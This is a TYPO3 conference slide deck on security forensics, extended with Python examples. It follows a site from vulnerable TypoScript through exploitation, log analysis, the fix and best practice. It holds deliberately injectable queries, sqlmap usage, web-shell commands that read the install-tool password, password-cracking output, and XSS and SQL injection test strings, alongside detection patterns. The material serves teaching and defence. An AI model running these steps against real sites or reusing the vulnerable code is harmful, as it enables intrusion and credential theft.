Security Forensics - T3DD15
Inspiring people to share
TYPO3 Developer Days 2015
Security Forensics
Helmut Hummel <[email protected]>
17.07.2015

#CertiFUNcation - Brühl 2015
Secure TYPO3

Agenda
• Diary of a Hack
• Pitfalls
• Best Practice

Diary of a Hack

Day 1 - Implementing a feature

lib.sqliSimple = CONTENT
lib.sqliSimple {
  table = tt_content
  # the GET parameter is pasted unescaped into the WHERE clause
  select.where.wrap = colPos=|
  select.where.data = GP:colPos
}

lib.sqliSearch = CONTENT
lib.sqliSearch {
  table = tt_content
  # same problem: the search term ends up inside the LIKE pattern unescaped
  select.where.wrap = header like '%|%'
  select.where.data = GP:search
}

Day 2 - Testing the feature

Debug settings switched on for testing:
'BE/debug' => '1'
'FE/debug' => '1'
'SYS/devIPmask' => '*'
'SYS/displayErrors' => '1'
'SYS/sqlDebug' => '1'
'SYS/exceptionalErrors' => '28674'

'DB/username' => 'root'

Day 3 - Distraction

Day 4 - Attraction

A web search for the SQL error message together with exec_SELECTquery finds sites that expose this debugging output:
https://www.google.de/?q=exec_SELECTquery+%22You+have+an+error+in+your+SQL+syntax%22

Day 5 - Exploitation

Disclaimer
Don’t do this at home!

$ sqlmap -u 'http://security.dev/insecurity/?colPos=0' -p 'colPos'
GET parameter 'colPos' is vulnerable. Do you want to keep testing the others? [y/N]
sqlmap identified the following injection points with a total of 30 HTTP(s) requests:

http://security.dev/tmpbrsru.php?cmd=touch%20typo3conf/ENABLE_INSTALL_TOOL
http://security.dev/typo3/sysext/install/Start/Install.php
http://security.dev/tmpbrsru.php?cmd=grep%20installToolPassword%20typo3conf/LocalConfiguration.php

$ john pw
Loaded 1 password hash (phpass MD5 [128/128 SSE2 intrinsics 4x4x5])
password         (dummy)
guesses: 1  time: 0:00:00:01 DONE (Thu Jun  4 11:00:44 2015)  c/s: 900  trying: 123456 - fishing

Day 5 - Discovery

Discovery
• Take site offline!
• seriously
• I mean it

Day 6 - Analysis

Analysis
• Make a backup of current state (files, DB)
• Search all logs for „suspicious“ entries
• Try to reproduce assumed entry points
• If in doubt: get help

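Searching logs for suspicious entries is easier once the traces this story leaves are written down as checks. The following Python script is an added example, not part of the slides and not a TYPO3 tool: it parses Apache/nginx combined-format access-log lines (the sample lines are constructed, mirroring the requests shown in the deck) and flags the ones that match an assumed indicator list: the sqlmap user agent, SQL tautologies or keywords in the query string, a cmd= parameter, and requests touching the Install Tool or ENABLE_INSTALL_TOOL.

```python
"""Flag access-log lines worth a closer look during incident analysis.
Added example; the indicator list is an assumption derived from the
slides and the sample log below is constructed."""
import re
from urllib.parse import unquote

# Apache/nginx "combined" log format.
LOG_RE = re.compile(
    r'(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"'
)

# Each indicator is (name, predicate over a parsed record). Assumed list.
INDICATORS = [
    ("sqlmap user agent",
     lambda r: "sqlmap" in r["ua"].lower()),
    ("SQL tautology in query string",
     lambda r: re.search(r"\b(or|and)\b\s+\d+\s*=\s*\d+", r["query"], re.I) is not None),
    ("SQL keyword in query string",
     lambda r: re.search(r"\b(union|select|sleep|benchmark)\b", r["query"], re.I) is not None),
    ("shell command via cmd= parameter",
     lambda r: re.search(r"(^|&)cmd=", r["query"]) is not None),
    ("Install Tool access",
     lambda r: "/typo3/sysext/install/" in r["path"]),
    ("ENABLE_INSTALL_TOOL touched",
     lambda r: "ENABLE_INSTALL_TOOL" in r["query"]),
]


def parse_line(line):
    """Parse one log line into a dict, or None if it is not in combined format."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    path, _, query = rec["path"].partition("?")
    rec["path"] = path
    rec["query"] = unquote(query)   # decode %20, %3D, ... before matching
    return rec


def scan(lines):
    """Return [(line_number, ip, path, [indicator names])] for suspicious lines."""
    hits = []
    for n, line in enumerate(lines, 1):
        rec = parse_line(line)
        if rec is None:
            continue
        names = [name for name, test in INDICATORS if test(rec)]
        if names:
            hits.append((n, rec["ip"], rec["path"], names))
    return hits


# Constructed sample log: one normal request, then requests mirroring the deck.
SAMPLE_LOG = [
    '203.0.113.5 - - [04/Jun/2015:10:58:01 +0200] "GET /insecurity/?colPos=0 HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
    '198.51.100.7 - - [04/Jun/2015:10:58:40 +0200] "GET /insecurity/?colPos=0%20OR%201%3D1 HTTP/1.1" 200 9870 "-" "sqlmap/1.0-dev (http://sqlmap.org)"',
    '198.51.100.7 - - [04/Jun/2015:10:59:12 +0200] "GET /tmpbrsru.php?cmd=touch%20typo3conf/ENABLE_INSTALL_TOOL HTTP/1.1" 200 12 "-" "Mozilla/5.0"',
    '198.51.100.7 - - [04/Jun/2015:10:59:30 +0200] "GET /typo3/sysext/install/Start/Install.php HTTP/1.1" 200 3300 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for n, ip, path, names in scan(SAMPLE_LOG):
        print(f"line {n}: {ip} {path} -> {', '.join(names)}")
```

Run it over a real access log with `scan(open(path))`. Every hit is something to review by hand rather than proof of compromise; Install Tool entries in particular will also show legitimate admin sessions, so compare them against who was supposed to be working on the site at that time.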
Day 7 - Fix

lib.sqliSimple = CONTENT
lib.sqliSimple {
  table = tt_content
  # ###colPos### is replaced by the quoted and escaped marker value
  select.where = colPos=###colPos###
  select.markers {
    colPos.data = GP:colPos
  }
}

lib.sqliSearch = CONTENT
lib.sqliSearch {
  table = tt_content
  select.where = header like ###search###
  select.markers {
    # the % wildcards are added to the value before it is quoted
    search.data = GP:search
    search.wrap = %|%
  }
}

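To see what the marker fix changes, here is an added Python example (not TYPO3 code and not from the slides) that models both WHERE clauses from Day 1 and Day 7 against an in-memory SQLite copy of tt_content. String concatenation stands in for select.where.wrap with GP data; SQLite's bound parameters stand in for TYPO3's quoted and escaped markers. That substitution is an assumption about the mechanism, not TYPO3's implementation, but the effect on the query is the same: the user's input is compared as a value instead of being parsed as SQL.

```python
"""Vulnerable vs. marker-style WHERE clauses, modelled with SQLite.
Added example; the tt_content rows are constructed."""
import sqlite3


def make_db():
    """Constructed tt_content table; uid 3 lives in a column the page never shows."""
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE tt_content (uid INTEGER PRIMARY KEY, header TEXT, colPos INTEGER)")
    con.executemany(
        "INSERT INTO tt_content (uid, header, colPos) VALUES (?, ?, ?)",
        [(1, "Welcome", 0), (2, "Contact", 0), (3, "Internal notes", 99)],
    )
    return con


# --- Day 1: string concatenation, like select.where.wrap + select.where.data = GP:... ---
def simple_vulnerable(con, col_pos):
    where = "colPos=" + col_pos                       # GP:colPos pasted verbatim
    return [r[0] for r in con.execute("SELECT header FROM tt_content WHERE " + where)]


def search_vulnerable(con, search):
    where = "header like '%" + search + "%'"          # wrap = header like '%|%'
    return [r[0] for r in con.execute("SELECT header FROM tt_content WHERE " + where)]


# --- Day 7: markers become a quoted/escaped value; here a bound parameter (assumption) ---
def simple_fixed(con, col_pos):
    # select.where = colPos=###colPos### with colPos.data = GP:colPos
    return [r[0] for r in con.execute("SELECT header FROM tt_content WHERE colPos=?", (col_pos,))]


def search_fixed(con, search):
    # select.where = header like ###search### with search.wrap = %|%:
    # the wildcards are part of the value, the user's quotes are data, not syntax
    pattern = "%" + search + "%"
    return [r[0] for r in con.execute("SELECT header FROM tt_content WHERE header like ?", (pattern,))]


if __name__ == "__main__":
    con = make_db()
    print(simple_vulnerable(con, "0"))                # the two rows in column 0
    print(simple_vulnerable(con, "0 OR 1=1"))         # every row, including colPos 99
    print(simple_fixed(con, "0 OR 1=1"))              # [] : the whole string is compared to colPos
    print(search_vulnerable(con, "co"))               # normal search works in both versions
    print(search_fixed(con, "x' OR header like '%"))  # [] : no header contains that text
```

The search variant keeps the user's own `%` and `_` wildcards effective, exactly as `search.wrap = %|%` does in TypoScript; that is a matching-semantics question rather than an injection, but worth knowing when the search field is exposed to anonymous visitors.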
Fix
• Close security issue in Code/ Extension/ Core
• Restore from backup
• Or if you really know what you are doing: cleanup installation
• Go online again
• Plan improvements (education, monitoring, …)

Further Pitfalls

Types of Security Threats
• Information disclosure
• SQL injection
• Cross Site Scripting (XSS)
• http://docs.typo3.org/typo3cms/SecurityGuide/TypesOfThreats/Index.html
• https://www.owasp.org/index.php/Category:Attack

TypoScript

page.10 = TEXT
page.10.field = title
page.10.wrap = <h1 class="c-{field:layout}">|</h1>
page.10.insertData = 1

page.10 = TEXT
# title can contain: {DB:be_users:1:password}
page.10.field = title
page.10.wrap = <h1 class="c-{field:layout}">|</h1>
# insertData resolves placeholders in the whole output, the editor's title included
page.10.insertData = 1

page.10 = TEXT
page.10.field = title
# dataWrap only resolves placeholders inside the wrap itself, not in the title
page.10.dataWrap = <h1 class="c-{field:layout}">|</h1>

page.10 = TEXT
# title can contain HTML
page.10.field = title
page.10.dataWrap = <h1 class="c-{field:layout}">|</h1>

page.10 = TEXT
page.10.field = title
page.10.dataWrap = <h1 class="c-{field:layout}">|</h1>
page.10.htmlSpecialChars = 1

page.10 = TEXT
# Avoid dataWrap or insertData if possible
# layout field might not be safe
page.10.field = title
page.10.dataWrap = <h1 class="c-{field:layout}">|</h1>
page.10.htmlSpecialChars = 1

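The sequence of slides above is really about the order in which stdWrap applies its steps. The Python below is an added model, not TYPO3 code and not from the slides: it applies field, htmlSpecialChars, wrap or dataWrap, and insertData in that order (which is the order stdWrap uses), resolves only {field:...} references (the slide's {DB:be_users:1:password} is stood in for by a constructed {field:secret} reference), and renders each slide's configuration on constructed records. render_safe, which has no TypoScript counterpart, shows what the output would have to look like for an untrusted layout value to be harmless: every inserted value escaped at the point of insertion, which is why the slide advises avoiding dataWrap and insertData with such data.

```python
"""Model of the stdWrap order behind the slides: field -> htmlSpecialChars ->
wrap/dataWrap -> insertData. Added example, not TYPO3 code. Only {field:...}
references are resolved; the records are constructed."""
import html
import re

PLACEHOLDER = re.compile(r"\{(\w+):([^}]+)\}")   # {type:key}, e.g. {field:layout}


def get_data(record, kind, key):
    """Tiny subset of TYPO3's getData(): only the 'field' type is modelled."""
    if kind == "field":
        return str(record.get(key, ""))
    return ""   # DB:, GP:, ... are deliberately not modelled here


def substitute(template, record, escape=False):
    """Replace every {type:key} in template; escape=True HTML-escapes each inserted value."""
    def repl(m):
        value = get_data(record, m.group(1), m.group(2))
        return html.escape(value, quote=True) if escape else value
    return PLACEHOLDER.sub(repl, template)


def render(record, field, wrap=None, data_wrap=None, html_special_chars=False, insert_data=False):
    """Render one TEXT object with the properties used on the slides, in stdWrap order."""
    content = str(record.get(field, ""))
    if html_special_chars:            # escapes the field value only
        content = html.escape(content, quote=True)
    if wrap is not None:              # plain wrap: placeholders are left untouched
        content = wrap.replace("|", content, 1)
    if data_wrap is not None:         # placeholders in the wrap are resolved, unescaped
        content = substitute(data_wrap, record).replace("|", content, 1)
    if insert_data:                   # placeholders anywhere in the output, title included
        content = substitute(content, record)
    return content


def render_safe(record, field, data_wrap):
    """Hypothetical: the field value and every wrap placeholder escaped on insertion."""
    content = html.escape(str(record.get(field, "")), quote=True)
    return substitute(data_wrap, record, escape=True).replace("|", content, 1)


WRAP = '<h1 class="c-{field:layout}">|</h1>'

# Constructed records; in both the title is editor input, in the second so is the layout.
TITLE_RECORD = {"title": "Hello {field:secret} <b>x</b>", "layout": "1", "secret": "s3cr3t"}
LAYOUT_RECORD = {"title": "Hello", "layout": '1"><script>alert(1)</script>'}


def slide_outputs():
    """Outputs of the slide configurations, in the order of the deck."""
    return {
        "wrap+insertData": render(TITLE_RECORD, "title", wrap=WRAP, insert_data=True),
        "dataWrap": render(TITLE_RECORD, "title", data_wrap=WRAP),
        "dataWrap+htmlSpecialChars": render(TITLE_RECORD, "title", data_wrap=WRAP, html_special_chars=True),
        "dataWrap+htmlSpecialChars, unsafe layout": render(LAYOUT_RECORD, "title", data_wrap=WRAP, html_special_chars=True),
        "escaped on insert": render_safe(LAYOUT_RECORD, "title", WRAP),
    }


if __name__ == "__main__":
    for name, out in slide_outputs().items():
        print(f"{name}: {out}")
```

The first output shows the information disclosure (the title's placeholder is resolved because insertData runs last, over everything); switching to dataWrap leaves the title's placeholder literal; htmlSpecialChars then neutralises HTML in the title but, because it runs before dataWrap, never touches the layout value that dataWrap inserts.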
Fluid

Extbase
XSS even when using Fluid
• Flash Messages
• HTML Context
• Custom View Helpers

Best Practice

• Defined Process
• Regular updates
• Backups
• Monitoring
• Education
• Reserve time for all of the above
• More in: http://docs.typo3.org/typo3cms/SecurityGuide/

Questions?

Resources
• http://sqlmap.org
• http://www.openwall.com/john/
• http://docs.typo3.org/typo3cms/SecurityGuide/
• https://www.owasp.org/